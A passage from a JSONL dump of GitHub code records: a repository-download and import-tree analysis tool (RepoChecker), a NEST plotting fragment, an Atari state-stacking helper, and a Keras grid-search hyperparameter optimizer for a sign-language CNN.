nest.GetStatus(voltmeter,\"events\")[0][\"V_m\"]\n\n pylab.plot(t, v, label=\"initial V_m=%.2f mV\" % vinit)\n\npylab.legend(loc=4)\npylab.xlabel(\"time (ms)\")\npylab.ylabel(\"V_m (mV)\")\npylab.show()\n","repo_name":"animesh/misccb","sub_path":"vinit_example.py","file_name":"vinit_example.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15457831109","text":"import config\nimport requests, os, re, string, shutil\nfrom github import Github\nimport zipfile\n\ng = Github(config.GITHUB_TOKEN)\nturnOff = False\nfirstPath = os.getcwd()\n\ndef splitList(_list):\n newList = []\n currentList = []\n x = 0\n for el in _list:\n if len(currentList) == 10 or x == len(_list):\n newList.append(currentList)\n currentList.clear()\n else:\n currentList.append(el)\n x+=1\n\ndef search_github(keywords):\n query = '+'.join(keywords) + '+in:readme+in:description'\n result = g.search_repositories(query, 'stars', 'desc')\n print(f'Found {result.totalCount} repo(s)')\n x = 0\n y = 0\n for repo in result:\n print(str(x) + \".\", repo.clone_url, repo.stargazers_count, \"stars\")\n x += 1\n choice = \"\"\n while choice != \"exit\":\n text = \"\"\"\n\\tType `page (number)` for go repository page.\n\\tType `exit` for leave to main menu.\n\\tType `all` for install all repositories from printed.\n\\tType id for install specific repository (eg. 1).\n\"\"\"\n print(text)\n choice = input(\"Your choice: \")\n try:\n choice = int(choice)\n print(choice, \"it is\")\n except:\n if choice == \"all\":\n print(\"all it is\")\n\ndef download_folder(url):\n r = requests.get(url, stream = True)\n zippedPath = firstPath + \"/projects/zipped/\"\n unzippedPath = firstPath + \"/projects/unzipped/\"\n with open(zippedPath + url.split(\"/\")[4]+\".zip\", \"wb\") as repo:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n repo.write(chunk)\n with zipfile.ZipFile(zippedPath + url.split(\"/\")[4]+\".zip\", 'r') as zip_ref:\n zip_ref.extractall(unzippedPath)\n print(\"Repository installed successfully.\")\n\ndef checkModules(pythonFiles, path):\n modules = []\n for file in pythonFiles:\n fileLines = open(file, \"r\").readlines()\n for line in fileLines:\n if line.startswith(\"#\"): continue\n if line.find(\"import \") >= 0:\n if line.find(\"=\") >= 0: continue\n if line.find(\"from \") >= 0:\n from_ = line.split(\"import\")[0]\n from_ = from_.replace(\"from \", \"\")\n if from_.find(\".\") >= 0: from_ = from_.split(\".\")[0].replace(\" \", \"\")\n module = from_\n alias = None\n prefunctions = []\n dotspl = str(str(line.split(\" import \")[0]).split(\"from \")).split(\".\")\n del dotspl[0]\n if line.find(\" as \") >= 0:\n alias = str(line.split(\" as \")[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n else:\n line = line.replace(\"from \", \"\")\n if line.split(\"import\")[1].find(\",\")>=0:\n alias = []\n for submod in line.split(\"import\")[1].split(\",\"):\n submod = str(submod.replace(\"\\n\", \"\")).replace(\" \", \"\")\n alias.append(submod)\n else:\n alias = str(line.split(\"import\")[1].replace(\" \", \"\")).replace(\"\\n\", \"\")\n for dot in dotspl:\n if dot.find(\" as \") >= 0:\n dot = dot.split(\" as \")[0]\n prefunctions.append(str(dot.replace(\" \", \"\")).replace(\"\\n\", \"\"))\n if module != \"*\":\n if module in [x['module'] for x in modules]:\n samem = [x for x in modules if x['module'] == module][0]\n if type(samem['alias']) != list:\n salias = samem['alias']\n samem['alias'] = list()\n samem['alias'].append(salias)\n samem['alias'].append(alias)\n else:\n if type(alias) == list:\n for alias in alias:\n samem['alias'].append(alias)\n else:\n samem['alias'].append(alias)\n for prefunc in range(len(prefunctions)):\n for character in string.punctuation:\n if character == \"_\": continue\n prefunctions[prefunc] = prefunctions[prefunc].replace(character, '')\n if samem['prefunctions'] == None:\n samem['prefunctions'] = list()\n samem['prefunctions'].extend(prefunctions)\n else:\n samem['prefunctions'].extend(prefunctions)\n modules = [x for x in modules if not x['module'] == module] + [samem]\n else:\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": prefunctions}\n modules.append(arr)\n elif line.find(\",\") >= 0:\n for module in str(line.split(\"import\")[1]).split(\",\"):\n module = module.replace(\"\\n\", \"\")\n alias = None\n if module.find(\" as \") >= 0:\n moas = module.split(\" as \")\n module = str(moas[0].replace(\"\\n\", \"\")).replace(\" \", \"\")\n alias = str(moas[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": None}\n modules.append(arr)\n elif line.find(\".\") >= 0:\n module = str(line.split(\"import\")[1]).split(\".\")[0]\n alias = None\n prefunctions = []\n dotspl = str(line.split(\"import\")[1]).split(\".\")\n del dotspl[0]\n if line.find(\" as \") >= 0:\n moas = line.split(\" as \")\n module = str(str(line.split(\"import\")[1]).split(\".\")[0].replace(\" \", \"\")).replace(\"\\n\", \"\")\n alias = str(moas[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n for dot in dotspl:\n if dot.find(\" as \") >= 0:\n dot = dot.split(\" as \")[0]\n prefunctions.append(str(dot.replace(\" \", \"\")).replace(\"\\n\", \"\"))\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n for prefunc in range(len(prefunctions)):\n for character in string.punctuation:\n if character == \"_\": continue\n prefunctions[prefunc] = prefunctions[prefunc].replace(character, '')\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": prefunctions}\n modules.append(arr)\n else:\n module = line.split(\"import\")[-1].replace(\"\\n\", \"\")\n alias = None\n if module.find(\" as \") >= 0:\n moas = module.split(\" as \")\n module = str(moas[0].replace(\" \", \"\")).replace(\"\\n\", \"\")\n alias = moas[1].replace(\"\\n\", \"\")\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": None}\n modules.append(arr)\n return modules\n\ndef makeModuleList(modules):\n moduleList = {}\n for module in modules:\n orgmodule = module\n module = module['module'].replace(\" \", \"\")\n moduleList[module] = []\n if type(orgmodule['prefunctions']) == list:\n if len(orgmodule['prefunctions']) > 0:\n for prefunc in orgmodule['prefunctions']:\n for character in string.punctuation:\n if character == \"_\": continue\n prefunc = prefunc.replace(character, '')\n moduleList[module].append(prefunc)\n return moduleList\n\ndef checkFunctions(modules, pythonFiles, moduleList):\n for file in pythonFiles:\n fileLines = open(file, \"r\").readlines()\n for line in fileLines:\n if line.startswith(\"#\"): continue\n for module in modules:\n orgmodule = module['module']\n try:\n if module['alias']:\n modulee = module['alias']\n else:\n modulee = module['module']\n except:\n modulee = module['module']\n if type(modulee) == list:\n for module in modulee:\n if type(module) != str: continue\n if line.find(module + \".\") >= 0 and line.find(\"import\") < 0 and line.find(\"from\") < 0:\n try:\n functionList = re.findall(r\"{}\\.(.*?)\\(\".format(module), line)\n except:\n continue\n for function in functionList:\n if function.find(\".\") >= 0:\n function = function.replace(\".\", \" -> \")\n if function.find(\"=\") >= 0: function = function.split(\"=\")[1]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n else:\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n elif line.find(orgmodule + \".\") >= 0 and line.find(\"import \") >= 0 and line.split(\"import \")[1].find(\".\") >= 0 and line.find(\"from\") < 0:\n funt = line.split(\"import \")[1]\n f = funt.split(\".\")\n f[1] = f[1].replace(\"\\n\", \"\")\n f[0] = f[0].replace(\" \", \"\")\n function = \"\"\n if len(f) > 2:\n del f[0]\n x = 1\n for frrom in f:\n if x == len(f):\n function += \" \" + frrom\n elif x == 1:\n function += frrom + \" ->\"\n else:\n function += \" \" + frrom + \" ->\"\n x+=1\n else:\n function = f[1]\n if function.find(\"as\") >= 0: function = function.split(\" as \")[0]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n moduleList[orgmodule.replace(\" \", \"\")].append(function) \n else:\n module = modulee\n if line.find(module + \".\") >= 0 and line.find(\"import\") < 0 and line.find(\"from\") < 0:\n functionList = re.findall(module + r\"\\.(.*?)\\(\", line)\n for function in functionList:\n if function.find(\".\") >= 0:\n function = function.replace(\".\", \" -> \")\n if function.find(\"=\") >= 0: function = function.split(\"=\")[1]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n else:\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n elif line.find(orgmodule + \".\") >= 0 and line.find(\"import \") >= 0 and line.split(\"import \")[1].find(\".\") >= 0 and line.find(\"from\") < 0:\n funt = line.split(\"import \")[1]\n f = funt.split(\".\")\n f[1] = f[1].replace(\"\\n\", \"\")\n f[0] = f[0].replace(\" \", \"\")\n function = \"\"\n if len(f) > 2:\n del f[0]\n x = 1\n for frrom in f:\n if x == len(f):\n function += \" \" + frrom\n elif x == 1:\n function += frrom + \" ->\"\n else:\n function += \" \" + frrom + \" ->\"\n x+=1\n else:\n function = f[1]\n if function.find(\"as\") >= 0: function = function.split(\" as \")[0]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n return moduleList\n\ndef formatModuleList(modules, moduleList):\n for module in modules:\n module = module['module']\n module = module.replace(\" \", \"\")\n moduleList[module] = list(set(moduleList[module]))\n moduleList[module] = [x for x in moduleList[module] if x != \"\"]\n return moduleList\n\ndef createTree(moduleList, path):\n treePath = firstPath + \"/trees/\" + path.split(\"/\")[-1] + \"/\"\n try:\n open(treePath + \"tree.txt\", \"w\")\n except:\n os.mkdir(treePath) \n open(treePath + \"tree.txt\", \"w\")\n for module in moduleList:\n module = module.replace(\" \", \"\")\n agac = open(treePath + \"tree.txt\", \"r\").read()\n open(treePath + \"tree.txt\", \"w\").write(agac + module + \"\\n\")\n if len(moduleList[module]) > 0:\n moduleList[module] = sorted(moduleList[module])\n for function in moduleList[module]:\n agac = open(treePath + \"tree.txt\", \"r\").read()\n open(treePath + \"tree.txt\", \"w\").write(agac + \"\\t\" + function + \"\\n\")\n return True\n\ndef repoCheck(path):\n os.chdir(path)\n pythonFiles = [os.getcwd()+\"/\" + x for x in os.listdir(os.getcwd()) if x.endswith(\".py\")]\n directories = [x[0] for x in os.walk(os.getcwd())]\n del directories[0]\n\n for directory in directories:\n pythonFiles = pythonFiles + [directory+\"/\" + x for x in os.listdir(directory) if x.endswith(\".py\")]\n pythonFiles = list(set(pythonFiles))\n\n modules = checkModules(pythonFiles, firstPath)\n moduleList = makeModuleList(modules)\n moduleList = checkFunctions(modules, pythonFiles, moduleList)\n moduleList = formatModuleList(modules, moduleList)\n tree = createTree(moduleList, path)\n os.chdir(firstPath)\n return tree\n\ndef checkRepos():\n repoPath = firstPath + \"/projects/unzipped/\"\n repos = [x for x in os.listdir(repoPath) if os.path.isdir(repoPath + x) == True]\n if len(repos) == 0:\n print(\"No repositories found.\")\n else:\n selected = \"\"\n while selected != \"exit\":\n x = 0\n for repo in repos:\n print(str(x) + \".\", repo)\n x+=1\n text = \"\"\"\n\\tType `exit` for return main menu.\n\\tType `all` for check all repositories and create tree scheme.\n\\tType id of repository to check specific repository. \n\"\"\"\n print(text)\n selected = input(\"Your choice: \")\n if selected == \"all\":\n for repo in repos:\n try:\n check = repoCheck(repoPath + repo)\n print(\"Tree creation for \" + repo + \"successfully finished.\" if check == True else \"Tree couldn't created successfully for \" + repo)\n except Exception as e:\n print(\"Tree couldn't created successfully for\", repo)\n print(\"Error:\", e)\n elif selected == \"exit\":\n break\n else:\n try:\n selected = int(selected)\n try:\n check = repoCheck(repoPath + repos[selected])\n print(\"Tree creation for \" + repos[selected] + \"successfully finished.\" if check == True else \"Tree couldn't created successfully for \" + repos[selected])\n except Exception as e:\n print(\"Tree couldn't created successfully for\", repos[selected])\n print(\"Error:\", e)\n except Exception as e:\n print(\"Please select choice in menu!\")\n\ndef eraseData():\n folders = [firstPath + \"/trees\", firstPath + \"/projects/unzipped\", firstPath + \"/projects/zipped\"]\n for folder in folders:\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n if not file_path.find(\"__init__.py\") >=0:\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n print(\"Successfully cleared path: %s\" % file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n print(\"Done erasing.\")\n\ndef checkChoice(choice):\n global turnOff\n if choice == 0:\n turnOff = True\n elif choice == 1:\n print(\"Under maintenance!\")\n #keywords = input('Enter keyword(s)[e.g python, flask, postgres]: ')\n #search_github([keyword.strip() for keyword in keywords.split(',')])\n elif choice == 2:\n url = input('Enter folder url: ')\n download_folder(url)\n elif choice == 3:\n checkRepos()\n elif choice == 4:\n eraseData()\n \nwelcomeText = f\"\"\"\n\\tWelcome to RepoChecker v{config.VERSION}\n\\n\n\\t0. Exit\n\\t1. Search with keywords. (Maintenance)\n\\t2. Download public repository.\n\\t3. Check downloaded repositories.\n\\t4. Erase all data.\n\"\"\"\nwhile turnOff == False:\n print(welcomeText)\n try:\n choice = int(input(\"Select from menu (eg. 1): \"))\n except:\n print(\"Chocie must be integer!\")\n continue\n checkChoice(choice)","repo_name":"MrMirhan/RepoChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1162762157","text":"import numpy as np\n\nfrom collections import deque\n\nclass State:\n def __init__(self, state, params):\n self.state = state.copy()\n self.params = params.copy()\n\ndef preprocess(config, state, params):\n st = State(state, params)\n st.state = st.state.astype(np.float32)\n st.params = st.params.astype(np.float32)\n\n return st\n\nclass stacked_env:\n def __init__(self, config):\n self.config = config\n self.max_len = config.get('state_stack_size')\n\n self.stack = deque(maxlen=self.max_len)\n\n def append(self, state, params):\n st = preprocess(self.config, state, params)\n if len(self.stack) == 0:\n self.reset(st)\n else:\n self.stack.append(st)\n\n def current(self):\n states = [st.state for st in self.stack]\n params = [st.params for st in self.stack]\n\n states = np.stack(states, axis=0)[-1]\n params = np.stack(params, axis=0)[-1]\n\n return State(states, params)\n\n def reset(self, st):\n for _ in range(self.max_len):\n self.stack.append(st)\n\n","repo_name":"bioothod/atari_gym_impala_client","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1687925482","text":"from Model.modelEnum import Environment\nfrom Constraints.hyperparameters import *\nfrom tensorflow.keras.optimizers import SGD\nfrom sklearn.model_selection import GridSearchCV\nfrom tensorflow.keras.constraints import max_norm\nfrom tensorflow.python.keras.models import Sequential\nfrom Exception.parametersException import IncorrectVariableType\nfrom tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier\nfrom Structures.NeuralNetworks.neuralNetworkEnum import AttributeToTuneEnum\nfrom tensorflow.python.keras.layers import Dense, Conv2D, MaxPool2D, Flatten, Dropout\nfrom Structures.NeuralNetworks.NeuralNetworksTypes.convolutionalNeuralNetwork import ConvolutionalNeuralNetwork\n\n\nclass HyperparameterOptimization:\n \"\"\"\n A class to get the optimal value for the hyperparameters of a convolutional neural network model.\n\n Attributes\n ----------\n logger : Logger\n A class used to show the execution information\n model : Model\n A class used to sync up all the functionalities that refer to the database\n nn_util : NeuralNetworkUtil\n A class to execute the common functionalities of a neural network structure\n cnn : ConvolutionalNeuralNetwork\n A class that contains the convolutional neural network structure and all its functionalities\n parameters_switcher : dictionary\n Dictionary that will return the function implementing the optimizer module based on the AttributeToTuneEnum\n enumerator\n \n Methods\n -------\n calculate_best_hyperparameter_optimization(attribute_tune)\n Calculate the best value for the CNN module based on the attribute selected\n \"\"\"\n \n def __init__(self, logger, model, nn_util):\n \"\"\"\n logger : Logger\n A class used to show the execution information\n model : Model\n A class used to sync up all the functionalities that refer to the database\n nn_util : NeuralNetworkUtil\n A class to execute the common functionalities of a neural network structure\n \"\"\"\n\n self.model = model\n self.logger = logger\n self.nn_util = nn_util\n self.cnn = ConvolutionalNeuralNetwork(logger, model, nn_util)\n\n self.parameters_switcher = self.__get_parameter_switcher()\n\n def calculate_best_hyperparameter_optimization(self, attribute_tune):\n \"\"\"Calculate the best value for the CNN module based on the attribute selected\n\n Parameters\n ----------\n attribute_tune : AttributeToTuneEnum\n Attribute to be optimized\n\n Raises\n ------\n IncorrectVariableType\n If the attribute_tune variable is not an AttributeToTuneEnum enumeration\n \"\"\"\n\n if not isinstance(attribute_tune, AttributeToTuneEnum):\n raise IncorrectVariableType(\"Expecting AttributeToTuneEnum enumeration\")\n\n n_classes, image_size = self.__prepare_data()\n grid = self.__get_grid_search_classifier(attribute_tune, n_classes, image_size)\n grid_result = self.__train_convolutional_neural_network(grid)\n \n self.__summarize_results(grid_result)\n\n def __get_grid_search_classifier(self, attribute_tune, n_classes, image_size):\n parameters_function = self.parameters_switcher.get(attribute_tune)\n param_grid, classifier = parameters_function(n_classes, image_size)\n grid = GridSearchCV(estimator=classifier, param_grid=param_grid, n_jobs=1, cv=3)\n return grid\n\n def __prepare_data(self):\n shape_train = self.model.get_x(Environment.TRAIN).shape\n n_classes = self.cnn.prepare_images()\n return n_classes, shape_train[1:]\n\n def __train_convolutional_neural_network(self, grid):\n x_train = self.model.get_x(Environment.TRAIN)\n y_train = self.model.get_y(Environment.TRAIN)\n grid_result = grid.fit(x_train, y_train)\n return grid_result\n\n @staticmethod\n def __get_parameters_for_batch_epochs(n_classes, image_size):\n batch_size = [10, 20, 40, 60, 80, 100]\n epochs = [10, 50, 100]\n\n param_grid = dict(batch_size=batch_size, epochs=epochs, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_batch_epochs, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_for_optimization_algorithm(n_classes, image_size):\n optimizer = ['SGD', 'RMSprop', 'Adagrad', 'Adadelta', 'Adam', 'Adamax', 'Nadam']\n\n param_grid = dict(optimizer=optimizer, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_optimizer_algorithm, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_for_learn_rate_and_momentum(n_classes, image_size):\n learn_rate = [0.001, 0.01, 0.1, 0.2, 0.3]\n momentum = [0.0, 0.2, 0.4, 0.6, 0.8, 0.9]\n\n param_grid = dict(learn_rate=learn_rate, momentum=momentum, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_learn_rate_and_momentum, epochs=EPOCHS,\n batch_size=BATCH_SIZE, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_network_weight_init(n_classes, image_size):\n init_mode = ['uniform', 'lecun_uniform', 'normal', 'zero', 'glorot_normal', 'glorot_uniform', 'he_normal',\n 'he_uniform']\n\n param_grid = dict(init_mode=init_mode, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_network_weight_init, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_neuron_activation_function(n_classes, image_size):\n activation = ['relu', 'softmax', 'softplus', 'softsign', 'tanh', 'sigmoid', 'hard_sigmoid', 'linear']\n\n param_grid = dict(activation=activation, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_neuron_activation_function, epochs=EPOCHS,\n batch_size=BATCH_SIZE, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_dropout_regularization(n_classes, image_size):\n weight_constraint = [1, 2, 3, 4, 5]\n dropout_rate = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n\n param_grid = dict(dropout_rate=dropout_rate, weight_constraint=weight_constraint, num_classes=[n_classes],\n image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_dropout_regularization, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_number_neurons(n_classes, image_size):\n neurons_conv_layer = [1, 5, 10, 15, 20, 25, 30, 40, 50, 60, 80, 100, 120, 140]\n neurons_dense_layer = [10, 20, 25, 30, 40, 50, 60, 80, 100, 120, 140]\n\n param_grid = dict(neurons_conv_layer=neurons_conv_layer, neurons_dense_layer=neurons_dense_layer,\n num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_number_neurons, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n def __summarize_results(self, grid_result):\n self.logger.write_info(\"Best: %f using %s\" % (grid_result.best_score_, grid_result.best_params_))\n means = grid_result.cv_results_['mean_test_score']\n stds = grid_result.cv_results_['std_test_score']\n params = grid_result.cv_results_['params']\n\n for mean, stdev, param in zip(means, stds, params):\n self.logger.write_info(\"%f (%f) with: %r\" % (mean, stdev, param))\n\n def __get_parameter_switcher(self):\n return {\n AttributeToTuneEnum.BATCH_SIZE_AND_EPOCHS:\n lambda n, size: self.__get_parameters_for_batch_epochs(n, size),\n AttributeToTuneEnum.OPTIMIZATION_ALGORITHMS:\n lambda n, size: self.__get_parameters_for_optimization_algorithm(n, size),\n AttributeToTuneEnum.LEARN_RATE_AND_MOMENTUM:\n lambda n, size: self.__get_parameters_for_learn_rate_and_momentum(n, size),\n AttributeToTuneEnum.NETWORK_WEIGHT_INITIALIZATION:\n lambda n, size: self.__get_parameters_network_weight_init(n, size),\n AttributeToTuneEnum.NEURON_ACTIVATION_FUNCTION:\n lambda n, size: self.__get_parameters_neuron_activation_function(n, size),\n AttributeToTuneEnum.DROPOUT_REGULARIZATION:\n lambda n, size: self.__get_parameters_dropout_regularization(n, size),\n AttributeToTuneEnum.NUMBER_NEURONS:\n lambda n, size: self.__get_parameters_number_neurons(n, size)\n }\n\n\ndef get_default_sequential_model(num_classes, image_size):\n \"\"\"Calculate the best value for the CNN module based on the attribute selected\n\n Parameters\n ----------\n num_classes : number\n Number of different types of classes in the database selected to train the model\n image_size : tuple\n Image shape\n\n Returns\n -------\n Sequential\n The convolutional neural network model to compile and train\n \"\"\"\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='relu',\n input_shape=(image_size[0], image_size[1], 1)))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n return model\n\n\ndef create_model_batch_epochs(num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the batch and epoch hyperparameters\n\n Parameters\n ----------\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n model.compile(optimizer=\"adam\", loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\n\ndef create_model_optimizer_algorithm(optimizer='adam', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value for the optimization algorithm hyperparameter\n\n Parameters\n ----------\n optimizer : string, optional\n Optimizer algorithm value (Default is \"adam\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_learn_rate_and_momentum(learn_rate=0.01, momentum=0, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the learn rate and momentum hyperparameters\n\n Parameters\n ----------\n learn_rate : string, optional\n Learn rate value (Default is 0.01)\n momentum : number, optional\n Momentum value (Default is 0)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n optimizer = SGD(learning_rate=learn_rate, momentum=momentum)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_network_weight_init(init_mode='uniform', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value for the network weight initialization hyperparameter\n\n Parameters\n ----------\n init_mode : string, optional\n Network weight initialization value (Default is \"uniform\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='relu',\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=init_mode))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer=init_mode, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_neuron_activation_function(activation='relu', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value for the neuron activation function hyperparameter\n\n Parameters\n ----------\n activation : string, optional\n Neuron activation function value (Default is \"relu\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=activation,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer='uniform', activation=activation))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_dropout_regularization(dropout_rate=0.0, weight_constraint=0, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the dropout rate and weight constraint hyperparameters\n\n Parameters\n ----------\n dropout_rate : number, optional\n Dropout rate value (Default is 0.0)\n weight_constraint : number, optional\n Weight constraint value (Default is 0)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=ACTIVATION,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE,\n kernel_constraint=max_norm(weight_constraint)))\n model.add(Dropout(dropout_rate))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer='uniform', activation=ACTIVATION))\n model.add(Dropout(dropout_rate))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n return model\n\n\ndef create_model_number_neurons(neurons_conv_layer=25, neurons_dense_layer=100, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the number of neurons of the convolutional and the dense layer\n\n Parameters\n ----------\n neurons_conv_layer : number, optional\n Neurons of the convolutional layer (Default is 25)\n neurons_dense_layer : number, optional\n Neurons of the dense layer (Default is 100)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(neurons_conv_layer, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=ACTIVATION,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE,\n kernel_constraint=max_norm(WEIGHT_CONSTRAINT)))\n model.add(Dropout(DROPOUT_RATE))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(neurons_dense_layer, kernel_initializer='uniform', activation=ACTIVATION))\n model.add(Dropout(DROPOUT_RATE))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n return model\n","repo_name":"marGaliana/SignLanguageProcessing","sub_path":"SignGestureDetection/Src/Structures/NeuralNetworks/hyperparameterOptimization.py","file_name":"hyperparameterOptimization.py","file_ext":"py","file_size_in_byte":18110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11656462983","text":"from flask import Flask, flash, redirect, render_template, request, 